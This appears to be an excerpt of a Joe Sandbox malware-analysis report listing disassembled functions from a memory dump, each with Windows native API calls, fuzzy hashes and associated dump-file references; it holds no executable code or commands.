Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AlertThreadWait
String ID:
API String ID: 2760959157-0
Opcode ID: fc41d24e11d2a9404eb21e2e9d0fd3c5dbd396defb4ff98238d9b001f3468772
Instruction ID: a9862ac05ee366dced862e2b9646a8289e844e03911bd314fe7e697b2a6c226a
Opcode Fuzzy Hash: fc41d24e11d2a9404eb21e2e9d0fd3c5dbd396defb4ff98238d9b001f3468772
Instruction Fuzzy Hash: 3151BE71E002159FCB0ACA5CD55075EB7B2EF84614B28856ED516EB3C4EB31DD02CB90

Uniqueness

Uniqueness Score: -1.00%

Function 72649420, Relevance: 1.6, APIs: 1, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,00000000), ref: 72649462

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d14c70e05543ecb8fa5b6807cd34aab6e9c6613f4b993712462ad2d8b5cc3d56
Instruction ID: 3e32b40fc53119c9fdf4b31de04f5ac97736015d7f13c1bf817000c6b5058c71
Opcode Fuzzy Hash: d14c70e05543ecb8fa5b6807cd34aab6e9c6613f4b993712462ad2d8b5cc3d56
Instruction Fuzzy Hash: 13416A31E012509FDB06DE6CC950FAA77B1EF80728F91906BE9868B2C4EA318F40C390

Uniqueness

Uniqueness Score: -1.00%

Function 72714747, Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,00000000,?,?,00000000,00000008,?,?,00000001,?), ref: 7271478F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f369e7f9b60306e20e95e2440d0a50a9fb50b4baba92eb4a77ea71bec92efbd3
Instruction ID: 0d5786b2b1bea9dbd335fe88e897c2662788db7671a198ea7b81a782453550d0
Opcode Fuzzy Hash: f369e7f9b60306e20e95e2440d0a50a9fb50b4baba92eb4a77ea71bec92efbd3
Instruction Fuzzy Hash: E031AEB1D0021AEFC714CF6DC981AADB7B1FF89315F15816AE855DB345D730AA11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 7265F050, Relevance: 1.6, APIs: 1, Instructions: 81timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.210A(00000000,?,00000000,00000000,72737B60,00000000,?,00000000,?,7265EF94,?,?,7267F2ED,72737B60,72737B60,00000000), ref: 7265F111

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 55ceffba29d087907f6982a7430952f949a90779fc17a35f9b267aff1420f845
Instruction ID: 7a0324d52a421e62a583bb27fa986691e2af6352ea9e3e76087ff00b5d598103
Opcode Fuzzy Hash: 55ceffba29d087907f6982a7430952f949a90779fc17a35f9b267aff1420f845
Instruction Fuzzy Hash: 3F318C31201B44CFD726CB2DC950B9AB7F5FF89714F24496EE89A87790EB35A801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 7270675E, Relevance: 1.6, APIs: 1, Instructions: 75memorynativeCOMMON

Download Yara Rule

APIs

ZwAllocateVirtualMemoryEx.210A(000000FF,?,?,?,?,00000000,00000000,?,-00000FFF), ref: 727067F9

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 4fa6306ad092aaf4c614dba16b52fcccfad74668f4200ddabf68594a2d19fea9
Instruction ID: d9f25f57621672967ba0461fb00b882fd21a77cee89c3831f61de0b0215697d6
Opcode Fuzzy Hash: 4fa6306ad092aaf4c614dba16b52fcccfad74668f4200ddabf68594a2d19fea9
Instruction Fuzzy Hash: B021A472D11608BFEB058EACC842ADEFBB5EB48320F14826DDD11F7291D6349D4886A2

Uniqueness

Uniqueness Score: -1.00%

Function 726D17AA, Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 726D1724: ZwQueryInformationProcess.210A(?,00000000,?,00000018,00000000), ref: 726D1737

ZwWaitForMultipleObjects.210A(00000000,?,00000001,00000001,?,00000000,?,00000000), ref: 726D182D

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationMultipleObjectsProcessQueryWait
String ID:
API String ID: 630360550-0
Opcode ID: ea200198ed0a13936f4f9f365c80e886d46fe43d47d4cdca77f1cdbe55409e1a
Instruction ID: 7542ecb9baa56ad5d52db7e00c79ed7f51c0eece7069f4b11903e973d4889cda
Opcode Fuzzy Hash: ea200198ed0a13936f4f9f365c80e886d46fe43d47d4cdca77f1cdbe55409e1a
Instruction Fuzzy Hash: F01160B1F4020D9BDF10CEBDC880AAFBBB9EB49604F14156BD816E7280D6B19D418791

Uniqueness

Uniqueness Score: -1.00%

Function 72682758, Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,?,00000060,?,?,7266C988,?), ref: 7268278C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2029c2d8a5a75de199220b888969bc09175c0d31375d66f0889d97130a7cd979
Instruction ID: e494ee7c0e9f5fc5cae9e1fdd21023faa96d6b07ea4cfaab6be82a1863d845d6
Opcode Fuzzy Hash: 2029c2d8a5a75de199220b888969bc09175c0d31375d66f0889d97130a7cd979
Instruction Fuzzy Hash: 94218E71A00249DFCB05CF99C580B6ABBB6FB49318F20416ED505A7350DB71AD16CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 7265740C, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

ZwQueryPerformanceCounter.210A(00000000,00000000,0000BB40,00000000,00000000,00000000,00000017,00000001,00000003,?), ref: 7265746F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CounterPerformanceQuery
String ID:
API String ID: 2783962273-0
Opcode ID: e8db9b1bd54f7733cacffd779d77eb53a3344ef80ef5f56c2f733ca5288e1b95
Instruction ID: 0231e2564f77459f939ecc2e340ac47486f759af58ae976dc29dbb8d368fae04
Opcode Fuzzy Hash: e8db9b1bd54f7733cacffd779d77eb53a3344ef80ef5f56c2f733ca5288e1b95
Instruction Fuzzy Hash: 30216D72E00119DBCB14CFADC58069AF7F9FB88350F664166E919B7354DA30AE44CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 7270E362, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00008000,?,?,?,DDEEDDEE,?,?,?,7270AFF7,?,?,?,00000000), ref: 7270E3C3

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession
String ID:
API String ID: 1007659313-0
Opcode ID: 68bc108acd92ebcd711f5222dfd6f8e22fb8d3419876b77fe920d17e7ce9849b
Instruction ID: da0bd05a2f476e051aed6b3d5f3b7a30712236274e5d49e987668eba99cee65d
Opcode Fuzzy Hash: 68bc108acd92ebcd711f5222dfd6f8e22fb8d3419876b77fe920d17e7ce9849b
Instruction Fuzzy Hash: BD110432A00518AFCB19CF58C905BADFBF5EF84310F04826AEC4697380DA31AE55CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 72643158, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 72676A2B: ZwFreeVirtualMemory.210A(000000FF,00000000,?,?,00000000,?,00000000,00000001,?,72704227,00000000,00008000,?), ref: 72676A40

RtlGetCurrentServiceSessionId.210A(00000000,00008000,?,?,?,?,?,726430AB,00000000,00008000), ref: 726431A9

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentFreeMemoryServiceSessionVirtual
String ID:
API String ID: 215549893-0
Opcode ID: a651e11e65a5f4ce93345901c5e53ad72455901563b3c761950e363e17a759e3
Instruction ID: f60595ea3d6073896eab9dac63e4a58751bce818f41eee9146cc943d7018ee07
Opcode Fuzzy Hash: a651e11e65a5f4ce93345901c5e53ad72455901563b3c761950e363e17a759e3
Instruction Fuzzy Hash: 9311B231901304EFD71ACF68C954F5ABBBAEBC5354F2485AED4419B2C0EB72AD52CB90

Uniqueness

Uniqueness Score: -1.00%

Function 7271469B, Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

ZwTraceControl.210A(00000028,00000174,00000004,?,00000002,0000001C,00000000,00000066,00000000,0000001C,00000000,00000000,?), ref: 727146F0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ControlTrace
String ID:
API String ID: 1197477875-0
Opcode ID: d92c57a2e44f7c0ac4e2ddf04336c452860bf4386e40053d6c0a1b70fed9d89d
Instruction ID: 284d4d489ee448c4aa5d4c6334d6a60745ccf82a986d642abdad6fa7d5d07ef1
Opcode Fuzzy Hash: d92c57a2e44f7c0ac4e2ddf04336c452860bf4386e40053d6c0a1b70fed9d89d
Instruction Fuzzy Hash: 7111D339601117AFD701DF59C682FBA73F9EF84715F5080BAEC0A9B292EB309845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 726FF074, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.210A(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000038,?,00000000,?,?,?), ref: 726FF0EA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7c9807b93e4909c330f69245067d587e88ec23552b7ba85184994aefdf32c78d
Instruction ID: d00ecbb9a7d36d1f1bfd632670c30064670e56a83215cdfb3682c039ff238cf8
Opcode Fuzzy Hash: 7c9807b93e4909c330f69245067d587e88ec23552b7ba85184994aefdf32c78d
Instruction Fuzzy Hash: 5411617660018ABBDF14CAADC954EAF7BBEDF94754B10005AA906D7680DA30DE01D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 7265660D, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,00000000,?,?,?,00000000,00000000,00000001,?,?,00000000,00000014,?,7264CF32,00000002), ref: 7265666E

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7b8af1350d43afa66902905a4e6891ab238fa8365aa9f948e95ae53f963501d2
Instruction ID: 752df81e17ecda76e04dbd9006517a03e4adb3d1953cb79e4c8f56c3a33d605f
Opcode Fuzzy Hash: 7b8af1350d43afa66902905a4e6891ab238fa8365aa9f948e95ae53f963501d2
Instruction Fuzzy Hash: 29017132700154ABD7248E9EDD51A9B7AFCEB847A0F24012AB906D7294DA30DD14C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 7264A380, Relevance: 1.6, APIs: 1, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

ZwAllocateVirtualMemory.210A(000000FF,?,00000000,?,00003000,00000004,?,?), ref: 7264A3BF

Part of subcall function 7268A360: LdrInitializeThunk.NTDLL(726D12FF,000000FF,00000000,00000000,0000000C,00001000,00000004,72720200,0000001C,726D1056), ref: 7268A36A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateInitializeMemoryThunkVirtual
String ID:
API String ID: 3902809231-0
Opcode ID: b631a71e1232131d6d9b50ad5c85a9e50a86cae1e7ef16908c7c077bdf9c1de4
Instruction ID: c3ac9700c802c11e0e2d9b09c9be368bdacee6f9992c84498b07c872d943fbe3
Opcode Fuzzy Hash: b631a71e1232131d6d9b50ad5c85a9e50a86cae1e7ef16908c7c077bdf9c1de4
Instruction Fuzzy Hash: A6110372900208ABD705CF59D841A8ABBF9EF84318F24816FE955D7280E671DA42DB54

Uniqueness

Uniqueness Score: -1.00%

Function 726847DE, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000001,?,?,?,72649E70,00000000), ref: 7268480F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession
String ID:
API String ID: 1007659313-0
Opcode ID: 55a41eed0b23adefb7efebf92466c37ec03a36c8d5381f074c01c25d48e4d68b
Instruction ID: 8a8f118e57701b8e96ac03159ec89e67ddb5f595d668a55a3164ef5937b6cb00
Opcode Fuzzy Hash: 55a41eed0b23adefb7efebf92466c37ec03a36c8d5381f074c01c25d48e4d68b
Instruction Fuzzy Hash: 4B01D4726001909FDB068E6DD884B85777ABFC8710F2981A7ED068F28AEA75D842C790

Uniqueness

Uniqueness Score: -1.00%

Function 72643200, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000001,00000000), ref: 726A0B9B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession
String ID:
API String ID: 1007659313-0
Opcode ID: a3cb86b5e38a24423ac365d7eea3a19451444c961cf7f35a681934ca8652edbd
Instruction ID: 5e1f6c9303c708d6325903a1dc3d20f9dff8bb54410a6ae84a31f47dc4e4cd3f
Opcode Fuzzy Hash: a3cb86b5e38a24423ac365d7eea3a19451444c961cf7f35a681934ca8652edbd
Instruction Fuzzy Hash: 8501D232100740AFD712DA7EDA40B9777F9EFC2254F10441BA98687980EE30E911C751

Uniqueness

Uniqueness Score: -1.00%

Function 727171DC, Relevance: 1.5, APIs: 1, Instructions: 49filenativeCOMMON

Download Yara Rule

APIs

ZwWriteFile.210A(?,00000000,00000000,00000000,00000000,?,?,000000F8,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 72717221

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: e152030a459929b154057be6e791a4f8a082eb7d432219fd02c3c864559f7a82
Instruction ID: 5e74449f688b7d7091ad3ee35549ced7b722b5be9fd1b2e943c11c2de9c90070
Opcode Fuzzy Hash: e152030a459929b154057be6e791a4f8a082eb7d432219fd02c3c864559f7a82
Instruction Fuzzy Hash: 0D0129B1604606AFC72A8B69C940A97B7F9EF89300F00856DF55A97210E730AC11CB60

Uniqueness

Uniqueness Score: -1.00%

Function 7265A01A, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69d4cffcf5930c53f471a626563cfae654681aaaa77bb587653d3da257fd94b
Instruction ID: 193e18e54f845c3e03b838b64f513f89131af1ed38dd976c2755897a263248e1
Opcode Fuzzy Hash: f69d4cffcf5930c53f471a626563cfae654681aaaa77bb587653d3da257fd94b
Instruction Fuzzy Hash: B5015A722105C09FD322865EC954F227BEDEF59798F0500A3EA06CB6E1E629DC41C625

Uniqueness

Uniqueness Score: -1.00%

Function 726414A0, Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 7264189D: _wcsicmp.210A(0000001C,?,?,?,00000000,?,?,?,?), ref: 72641941

RtlFreeHeap.210A(?,00000000,?,00000000,00000000,?,00000000,?,?,?), ref: 726414F3

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FreeHeap_wcsicmp
String ID:
API String ID: 3832816018-0
Opcode ID: 4f2e33aa38b5843ec3cb8e039e1f887dd7af21bdc7ac50f434df5daf9bd89d20
Instruction ID: b2bd95eaccf82d7f6978890d81877e93384b1cb7793bea05a642d43bb93c30b3
Opcode Fuzzy Hash: 4f2e33aa38b5843ec3cb8e039e1f887dd7af21bdc7ac50f434df5daf9bd89d20
Instruction Fuzzy Hash: 53F0A475B01108ABCB15DA4CC940FFEBBBEDF84604F6011AAA916E7380DA309F01C790

Uniqueness

Uniqueness Score: -1.00%

Function 726CA0DE, Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

ZwRaiseHardError.210A(4000000E,00000001,00000001,?,00000002,?,00000000,?,?,00000000,?,?,72656F67,?,00000000,00000000), ref: 726CA119

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ErrorHardRaise
String ID:
API String ID: 435474256-0
Opcode ID: f7bfacfcbe9753837c6b9430b618dacae198d8c3e34d40c93e330e75c9a12547
Instruction ID: fa19fa4fd861914966ede1db39aab1da22ad502f882044f881116f90698045e3
Opcode Fuzzy Hash: f7bfacfcbe9753837c6b9430b618dacae198d8c3e34d40c93e330e75c9a12547
Instruction Fuzzy Hash: 16F0F432A41244AFD711EE4DD940B9673B8E744725F100A6BFA419B6C1D2B0EDC1CB81

Uniqueness

Uniqueness Score: -1.00%

Function 72705053, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

ZwProtectVirtualMemory.210A(000000FF,?,00001000,00000001,?,?,72705200,?), ref: 727050AA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: cac558a655bde1e369c099c7cde8052422173c49b5e45948f80639d6f732b9f2
Instruction ID: 5c28a404a19dc4ee31ad1153769f7137ba5651295296f61ad5296253c941dd4d
Opcode Fuzzy Hash: cac558a655bde1e369c099c7cde8052422173c49b5e45948f80639d6f732b9f2
Instruction Fuzzy Hash: 95F0EC7680014DAACB11CF98C941FFFB7BCFB08355F5002A6E955A7180E771A699CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 7266B70C, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

ZwSetInformationWorkerFactory.210A(?,00000003,?,00000004,?,?,?,72643601,?,?,?,00000008,0000001E), ref: 7266B748

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FactoryInformationWorker
String ID:
API String ID: 270927234-0
Opcode ID: a799af852c0277e68282aeaccd50e7ac8f388d31e81d08619c580974d3a3ea34
Instruction ID: 86e256ccd3b60941f03f3540b87ade98b5217b129c8bd6d419c708d2ae15a68f
Opcode Fuzzy Hash: a799af852c0277e68282aeaccd50e7ac8f388d31e81d08619c580974d3a3ea34
Instruction Fuzzy Hash: 6CF08272950219E7F7228A2DC901AB63AAC9F41764F15026BAC56EA1D4EA71DD1187C0

Uniqueness

Uniqueness Score: -1.00%

Function 7266C620, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

ZwSetInformationWorkerFactory.210A(?,00000009,?,00000004,00000000,?,?), ref: 7266C662

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
